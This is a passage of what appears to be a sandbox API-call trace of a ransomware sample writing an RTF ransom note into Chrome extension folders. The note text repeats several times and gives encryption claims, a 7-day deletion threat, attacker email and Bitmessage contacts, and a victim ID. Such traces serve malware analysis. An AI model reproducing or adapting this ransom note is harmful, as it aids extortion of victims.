}}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0286.571] WriteFile (in: hFile=0x2f0, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.572] CloseHandle (hObject=0x2f0) returned 1 [0286.572] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\#readme_eman#.rtf")) returned 0xffffffff [0286.572] GetLastError () returned 0x2 [0286.572] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.573] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.573] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.573] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 